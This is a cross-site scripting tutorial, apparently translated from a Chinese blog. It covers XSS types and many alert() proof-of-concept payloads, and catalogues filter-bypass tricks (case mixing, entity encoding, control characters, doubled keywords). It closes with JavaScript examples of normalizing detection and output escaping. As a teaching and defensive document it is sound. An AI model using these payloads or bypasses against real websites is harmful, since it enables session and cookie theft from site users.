Table of Contents
1. XSS principle
2. XSS hazards
3. XSS test environment download
4. XSS classification
5. The structure of XSS
6. XSS deformation (a must-ask interview question)
7. XSS defense
8. XSS challenge
1. XSS principle
XSS stands for Cross-Site Scripting. The natural abbreviation would be CSS, but because that clashes with CSS (Cascading Style Sheets) it is abbreviated XSS instead. XSS attacks are carried out mainly with JavaScript, which can manipulate HTML, CSS and the browser itself very flexibly.
XSS injects attacker-constructed code (JavaScript) into a web page; the browser interprets and runs that code, producing the malicious effect. When a user visits a page into which an XSS script has been injected, the script is delivered together with the page, and the user's browser parses and executes it, which means the user has been attacked. All the user has to do is browse the web: the browser contains a JavaScript interpreter that runs whatever JavaScript it is handed, and it does not judge whether that code is malicious. In other words, the targets of XSS are users and their browsers.
2. XSS hazards
- Steal various user accounts
- Steal user cookie information, pretend to be a user and enter the website
- Hijack user sessions and perform arbitrary operations
- Inflate traffic, display pop-up ads
- Spread worms
3. XSS test environment download
We will get to know XSS through a practice environment. The download address is xss_test; after downloading, place it in the root directory of the website and it can be accessed.
4. XSS classification
1. Reflected XSS
Reflected XSS is non-persistent, parameter-based cross-site scripting. The JS code of a reflected XSS lives in a parameter (variable) of the web application, for example a search box. Whenever the content we enter is output to the web page as-is, we can suspect a reflected XSS.
For example, we typed the number 2323 into the search box and submitted the form, intercepted the request, and found that the data 2323 was submitted to xss.php and then output to the web page as-is. Next we look at the source code of xss.php.
In the source code of xss.php, written in PHP, we found that the statement we submitted is echoed to the web page as-is. So the input is output to the page without any filtering, which means we can submit JS code.
Submit a piece of pop-up JS code such as <script>alert(/xss/)</script>. When the browser encounters the JS code it executes the pop-up automatically, and this is a reflected XSS.
This is reflected XSS!!
2. Stored XSS
Stored XSS is persistent cross-site scripting. Persistence means the XSS code does not live in a parameter (variable) but is written into a medium that stores data permanently, such as a database or a file. Stored XSS usually occurs in places such as message boards: you leave a message on the board, and the malicious code is written into the database.
If the message board has a stored XSS and we inject JS code, we have only completed the first step: writing the malicious code into the database. Because XSS uses JS, and JS runs in the browser, a browser must load the malicious code from the server before the XSS is actually triggered (the code runs). At this point we simulate the site's back-end administrator viewing the message.
3. DOM-based XSS
DOM is the Document Object Model. The attack payload modifies the DOM tree of the page in the victim's browser. What makes it special is that the payload takes effect by modifying the DOM tree locally in the browser and is never sent to the server, which makes DOM XSS harder to detect.
Open the DOM XSS page.
The script takes the characters after "message=" in the URL and writes them into the web page.
Submit the data ?message=2021, and the browser outputs the data we submitted.
Viewing the page source at this point, the source has not changed; inspecting the element, however, shows the data we submitted. This confirms what was said above: DOM XSS modifies the DOM tree of the page in the victim's browser.
JS code can be submitted in the same way.
5. The structure of XSS
1. Use <> to construct HTML/JS
Construct a script tag
<script>alert(/xss/)</script>
2. Pseudo-protocol
javascript:<js code>   constructs XSS via the javascript: pseudo-protocol
You can put the pseudo-protocol into an HTML hyperlink
<a href="javascript:alert(/xss/)">touch me!</a> # clicking the hyperlink triggers the XSS
3. Generate your own event (html event)
"Event-driven" is a classic programming idea. Many events (mouse movement, keyboard input, and so on) occur in a web page, and JS can respond to them. So we can trigger JS functions, and therefore XSS, through events.
Click event
<input type="button" onclick ="alert(/xss/)" value="点我! ">
Double-click event
<input type="button" ondblclick="alert(/xss/)" value="双击666">
Hover
<img src='./smile.jpg' onmouseover='alert(/xss/)'>
Pop-up when the image fails to load
<img src='#' onerror="alert(/xss/)">
Triggered by a key press
<input type="text" onkeydown="alert(/xss/)">
4. Other tags and techniques
We can also use other tags to trigger XSS.
Pop-up as soon as it is submitted
<svg onload="alert(/xss/)"> # svg is a new tag in HTML5, and onload is also an event
Focus: automatic focus
<input onfocus=alert(/xss/) autofocus> # focus jumps to this element automatically and the pop-up fires
6. XSS deformation (a must-ask interview question)
Some web pages filter XSS, but we can bypass the filter by deforming the payload.
1. Case conversion
Change the case of the payload, as in the following two examples.
<Img sRc='#' Onerror="alert(/xss/)"/>
# alert is JavaScript and case-sensitive, so only the HTML parts (img and src) can be case-converted
<A hREf="javaScript:alert(/xss/)">click me</A>
We can submit these two statements for testing.
2. Use of quotation marks
HTML is not sensitive to quoting: attribute values may be written with double quotes, single quotes, or no quotes at all.
<img src="#" onerror="alert(/xss/)"/>
<img src='#' onerror='alert(/xss/)'/>
<img src=# onerror=alert(/xss/) />
3. / instead of spaces
A forward slash can be used instead of spaces.
<Img/sRc='#'/Onerror='alert(/xss/)' /> # alert(/xss/) uses slashes to avoid single quotes as far as possible
<Img/sRc='#'/Onerror=alert('xss') />
<Img/sRc='#'/Onerror='alert(/AJEST/)' />
4. Line breaks
In some places a Tab (horizontal tab) or a carriage return/line feed can be inserted to bypass keyword detection.
<A hREf="j
avas
c
r
i
p
t:alert(/xss/)">click me!</a>
5. Transcode tag attribute values
Encode the tag attribute value to bypass filtering. The corresponding codes are as follows:
Letter   ASCII (decimal)   Decimal entity   Hexadecimal entity   Note
a        97                &#97;            &#x61;               the semicolon marks the end of the entity
e        101               &#101;           &#x65;
- ASCII encoding reference https://www.sojson.com/asciitable.html
- Hexadecimal encoding https://www.convertstring.com/zh_CN/EncodeDecode/HexEncode
- URL encoding https://www.w3school.com.cn/tags/html_ref_urlencode.html
For example, encode the attribute value of <A hREf="javaScript:alert(/xss/)">click me</A>: the two letters a in javaScript are encoded, one as the decimal entity &#97; and one as the hexadecimal entity &#x61;, as follows:
<A hREf="j&#97;v&#x61;Script:alert(/xss/)">click me</A>
Clicking gives the same pop-up.
In addition, we can insert control characters such as carriage return, line feed and horizontal tab into the code.
For the meaning of the ASCII control characters, please refer to https://blog.csdn.net/sxdtzhp/article/details/50993571
Tab              &#9;
Line feed        &#10;
Carriage return  &#13;
SOH              &#1;   (an ASCII control character; SOH is Start Of Heading, marking the beginning of a header; optional, has no effect, just the start of the data stream)
STX              &#2;   # Start of Text
What it looks like after encoding (the control characters written as HTML numeric entities):
<A hREf="j&#9;avas&#10;c&#13;r&#1;i&#2;pt:alert(/xss/)">click me!</a>
6. Split cross-site
The core idea is to split a relatively long JS statement into short pieces and submit them separately. For example, <script>alert(/xss/)</script> can be split as follows:
<script>z='alert'</script> # first submission
<script>z=z+'(/xss/)'</script> # second submission
<script>eval(z)</script> # third submission
You leave three messages. When all three are loaded on the same page at the same time, the XSS is triggered.
7. Double write bypass single filter
If a keyword is filtered only once, double writing bypasses it. If the program removes the keyword <script> in a single pass, we can submit <sc<script>ript>: after the inner <script> is removed, the remaining characters join up into <script> again.
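The variants in this section all target the same weak defense: a one-pass, case-sensitive, literal keyword check. The following is an added example (not code from the original post) that puts such a check next to a normalizing check, so it is clear what each one sees. It decodes HTML numeric entities, strips control characters, lowercases, and treats / between attributes as whitespace before matching; it also contrasts a single `replace` with a repeat-until-stable removal for the double-write case. The sample payloads are the ones from this section; the function names are mine. Plain Node.js, no dependencies.

```javascript
// Added example for the "XSS deformation" section (not code from the original post):
// a naive keyword filter beside a normalizing detector. Detection aid only, not an
// output encoder; the proper fix is context-aware escaping on output.

// 1) The kind of filter the bypasses target: case-sensitive, one pass, literal match.
function naiveBlacklistHit(input) {
  return ['<script>', 'javascript:', 'onerror'].some((k) => input.includes(k));
}

// "Double write bypass": replace() with a string pattern removes only the first
// occurrence, so <sc<script>ript> collapses into <script>.
function naiveFilter(input) {
  return input.replace('<script>', '');
}

// Repeat the removal until nothing changes, so a doubled keyword cannot re-form.
function stableFilter(input) {
  let s = input;
  let prev;
  do {
    prev = s;
    s = s.replace(/<script>/gi, '');
  } while (s !== prev);
  return s;
}

// 2) Normalisation: undo what the browser undoes before it runs the payload.

// Decode HTML numeric character references (&#97; and &#x61;); tolerate a missing ';'.
function decodeNumericEntities(s) {
  return s.replace(/&#(x[0-9a-f]+|[0-9]+);?/gi, (match, num) => {
    const cp = num[0].toLowerCase() === 'x' ? parseInt(num.slice(1), 16) : parseInt(num, 10);
    return cp <= 0x10ffff ? String.fromCodePoint(cp) : match;
  });
}

const CONTROL_CHARS = /[\x00-\x1f\x7f]/g;

function normalize(input) {
  let s = input;
  // Decode until stable, in case an entity was itself entity-encoded.
  for (let i = 0; i < 5; i++) {
    const next = decodeNumericEntities(s);
    if (next === s) break;
    s = next;
  }
  s = s.replace(CONTROL_CHARS, ''); // Tab, LF, CR, SOH, STX ... disappear
  s = s.toLowerCase(); // tag and attribute names are case-insensitive
  // Inside a start tag, '/' separates attributes just like whitespace (<Img/sRc=...>).
  return s.replace(/<([a-z][a-z0-9]*)([^>]*)>/g, (m, tag, attrs) => {
    const flat = attrs.replace(/\//g, ' ').replace(/\s+/g, ' ').trim();
    return flat ? `<${tag} ${flat}>` : `<${tag}>`;
  });
}

// 3) Detection on the normalised form. Deliberately broad patterns.
const ACTIVE_CONTENT = [/<script\b/, /javascript:/, /\son[a-z]+\s*=/];

function normalizedHit(input) {
  const n = normalize(input);
  return ACTIVE_CONTENT.some((re) => re.test(n));
}

// Constructed samples: the variants shown in this section of the post.
const VARIANTS = {
  caseMix: `<Img sRc='#' Onerror="alert(/xss/)"/>`,
  slashes: `<Img/sRc='#'/Onerror='alert(/xss/)' />`,
  entities: `<A hREf="j&#97;v&#x61;Script:alert(/xss/)">click me</A>`,
  controls: `<A hREf="j&#9;avas&#10;c&#13;r&#1;i&#2;pt:alert(/xss/)">click me!</a>`,
  autofocus: `<input onfocus=alert(/xss/) autofocus>`,
};

// For each variant: does the naive check fire, and does the normalizing check fire?
function compare() {
  const rows = {};
  for (const [name, payload] of Object.entries(VARIANTS)) {
    rows[name] = { naive: naiveBlacklistHit(payload), normalized: normalizedHit(payload) };
  }
  return rows;
}

console.table(compare());
console.log('naive filter :', JSON.stringify(naiveFilter('<sc<script>ript>')));
console.log('stable filter:', JSON.stringify(stableFilter('<sc<script>ript>')));
```

Every variant passes the naive check and trips the normalized one, and the naive filter turns <sc<script>ript> into <script> while the stable filter leaves nothing. The "split cross-site" technique is not covered here because it defeats a length limit rather than a keyword filter: each fragment is a plain <script> tag and is flagged as such.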
7. XSS defense
1) Limit the length of input strings, on both the front end and the server side.
2) HTML-escape on both the front end and the server side: encode special characters such as "<" and ">" as their corresponding HTML entities. The core of anti-XSS is filtering the data.
3) Black/white-list strategy: whether input filtering or output encoding is used, the data is checked against a black list or a white list.
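To tie the reflected-XSS example and defense items 1 and 2 together, here is an added example that is not code from the original post or the xss_test environment: the search-box echo first as the post describes xss.php (input placed into the page unfiltered), then with HTML escaping and a length cap. It also shows the one case where escaping is not enough, a user-supplied link, where the javascript: pseudo-protocol has to be rejected by scheme allow-listing. The function names, the MAX_QUERY_LEN value and the placeholder base URL are my assumptions. Plain Node.js, no dependencies.

```javascript
// Added example (not code from the original post): unfiltered echo vs escaped output,
// plus scheme allow-listing for links. Node.js, no dependencies.

// Escape the five characters that can change HTML context. Correct for text nodes and
// for quoted attribute values; NOT sufficient inside <script> blocks or inside URLs.
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Mirrors the behaviour the post describes for xss.php: the parameter lands in the page as-is.
function renderSearchUnsafe(query) {
  return `<p>You searched for: ${query}</p>`;
}

const MAX_QUERY_LEN = 100; // defense item 1; the limit itself is assumed, not from the post

// Hardened version: same page, value escaped for the HTML text context and length-capped.
function renderSearchSafe(query) {
  const clipped = String(query).slice(0, MAX_QUERY_LEN);
  return `<p>You searched for: ${escapeHtml(clipped)}</p>`;
}

// Escaping cannot fix a URL context: "javascript:alert(1)" survives escapeHtml untouched.
// For user-supplied links, allow only http(s) after parsing. The WHATWG URL parser removes
// tabs/newlines and leading spaces before it reads the scheme, so the whitespace and
// control-character variants from the "deformation" section are rejected as well.
function safeHref(userUrl) {
  let parsed;
  try {
    // The base is a placeholder; it only matters for resolving relative links.
    parsed = new URL(String(userUrl), 'https://placeholder.invalid/');
  } catch {
    return '#';
  }
  return parsed.protocol === 'http:' || parsed.protocol === 'https:' ? String(userUrl) : '#';
}

function renderLinkSafe(userUrl, label) {
  return `<a href="${escapeHtml(safeHref(userUrl))}">${escapeHtml(label)}</a>`;
}

// Crude check used only to show the difference between the two renderers.
function containsActiveContent(html) {
  return /<script\b|\son[a-z]+\s*=|javascript:/i.test(html);
}

const PAYLOAD = '<script>alert(/xss/)</script>'; // the post's own test payload

function demo() {
  const unsafe = renderSearchUnsafe(PAYLOAD);
  const safe = renderSearchSafe(PAYLOAD);
  return {
    unsafe,
    safe,
    unsafeActive: containsActiveContent(unsafe),
    safeActive: containsActiveContent(safe),
    link: renderLinkSafe('javascript:alert(/xss/)', 'touch me!'),
  };
}

console.log(demo());
```

The escaped page still shows the user exactly what they typed, but as text: the browser renders &lt;script&gt; as the characters "<script>" and never creates an element from it. The link helper turns the pseudo-protocol payload into a harmless "#" href while passing ordinary http(s) URLs through unchanged.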
8. XSS challenge
Try the hands-on challenge: portal -> the xss-challenge XSS challenge
——Heart, if there is no place to live, it will be wandering everywhere